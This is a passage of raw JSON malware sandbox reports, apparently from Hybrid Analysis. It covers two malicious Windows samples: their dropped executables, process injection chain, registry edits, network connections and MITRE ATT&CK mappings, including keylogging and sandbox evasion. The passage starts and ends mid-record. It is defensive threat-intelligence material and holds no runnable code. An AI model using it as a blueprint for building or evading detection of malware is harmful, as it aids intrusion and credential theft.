\"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has an entrypoint in section \".Jk)\"\n \"muniw.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" wrote 24576 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bauqs.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"xyzuqi.exe\" wrote 11895 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\muniw.exe\": 4d5a50000200000004000f00ffff0000ff0000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ff10000e1fff09ff21ff014cff21ffff546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a24370000000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"muniw.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%TEMP%\\muniw.exe]- [targetUID: 00000000-00004108]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e\" has section name .Jk) with entropy \"7.96981994995\"\n \"muniw.exe\" has section name UPX1 with entropy \"7.99923984807\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"muniw.exe\" has a section named \"UPX0\"\n \"muniw.exe\" has a section named \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%TEMP%\\bauqs.exe\" spawned likely due to injection\n Process \"%TEMP%\\muniw.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"%TEMP%\\xyzuqi.exe\" connects to <IPv4> on port 11110 (TCP)\n Process \"%TEMP%\\xyzuqi.exe\" connects to <IPv4> on port 11170 (TCP)\n Process \"%TEMP%\\xyzuqi.exe\" connects to <IPv4> on port 11110 (TCP)\n Process \"%TEMP%\\xyzuqi.exe\" connects to <IPv4> on port 11110 (TCP)", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "binary-60", "type": 8, "relevance": 5, "name": "Dropped file has high entropy (likely encrypted/compressed content)", "description": "Dropped file \"%TEMP%\\muniw.exe\" has high entropy 7.987340457242641", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"bauqs.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"bauqs.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"xyzuqi.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"xyzuqi.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\bauqs.exe (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\_vslite.bat (UID: 00000000-00005920)\n \"bauqs.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\xyzuqi.exe (UID: 00000000-00005756)\n \"xyzuqi.exe\" called \"ShellExecuteW\" with parameter %TEMP%\\muniw.exe (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\_vslite.bat (UID: 00000000-00004108)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (UID: 00000000-00005920)\n Spawned process \"bauqs.exe\" (UID: 00000000-00005756)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00005740)\n Spawned process \"xyzuqi.exe\" with commandline \"OK\" (UID: 00000000-00004108)\n Spawned process \"muniw.exe\" (UID: 00000000-00001844)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00000568)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bauqs.exe\" (Handle: 656)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bauqs.exe\" (Handle: 656)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bauqs.exe\" (Handle: 656)\n \"bauqs.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xyzuqi.exe\" (Handle: 680)\n \"bauqs.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xyzuqi.exe\" (Handle: 680)\n \"bauqs.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xyzuqi.exe\" (Handle: 680)\n \"xyzuqi.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\muniw.exe\" (Handle: 848)\n \"xyzuqi.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\muniw.exe\" (Handle: 848)\n \"xyzuqi.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\muniw.exe\" (Handle: 848)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"xyzuqi.exe\" allocated memory in \"%TEMP%\\xyzuqi.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 11110\n TCP traffic to <IPv4> on port 11170\n TCP traffic to <IPv4> on port 11110\n TCP traffic to <IPv4> on port 11110", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a
https://hybrid-analysis.com/sample/0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a
Hybrid Analysis - Infostealers
{"size": 1007952, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a", "sha256": "0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a", "av_detect": 93, "vx_family": "Trojan.NetMail", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates": [{"owner": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "issuer": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "serial_number": "3300000439f61f7a676da000af000000000439", "md5": "07:BA:2F:13:9D:35:45:5A:93:4A:B0:CE:D1:0C:BE:41", "sha1": "5A:25:7D:33:37:18:C4:B4:68:A5:DB:C6:64:33:48:AF:66:7A:EE:3D", "valid_from": "2021-09-02T18:25:58+00:00", "valid_until": "2022-09-01T18:25:58+00:00"}, {"owner": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "issuer": "CN=Microsoft Root Certificate Authority 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "serial_number": "610c524c000000000003", "md5": "B7:A7:B4:60:5E:33:38:9F:48:B3:3D:17:CA:E7:30:06", "sha1": "8B:FE:31:07:71:2B:3C:88:6B:1C:96:AA:EC:89:98:49:14:DC:9B:6B", "valid_from": "2010-07-06T20:40:17+00:00", "valid_until": "2025-07-06T20:50:17+00:00"}], "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 2, "total_signatures": 204, "extracted_files": [{"name": "upNext.exe", "file_path": "%LOCALAPPDATA%\\upNext.exe", "file_size": 1007952, "sha256": "5a684662fec675df8cc03f0fbbc1efe51d8948713563a4279e8eb872b2c1f522", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe (PID: 6072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp", "file_path": "C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp", "file_size": 1007952, "sha256": "febb88fd9c494802c47aa3de7c1db0b1e93321f4cf64d9b13b8351c3e28e93f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe (PID: 6072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "upNext.tmp", "file_size": 1007952, "sha256": "5a684662fec675df8cc03f0fbbc1efe51d8948713563a4279e8eb872b2c1f522", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279804, "sha256": "bec91b4225c4ea2063935984fffb589f7644feb00a8129186bb07bdf55452bb0", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67A48282.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "upNext.exe.bin", "file_size": 1007952, "sha256": "febb88fd9c494802c47aa3de7c1db0b1e93321f4cf64d9b13b8351c3e28e93f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00006072", "name": "0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe", "normalized_path": "C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe", "sha256": "0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a"}, {"uid": "00000000-00002104", "name": "upNext.exe", "normalized_path": "%LOCALAPPDATA%\\upNext.exe", "command_line": "--i", "sha256": "febb88fd9c494802c47aa3de7c1db0b1e93321f4cf64d9b13b8351c3e28e93f7"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 5, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "malicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", 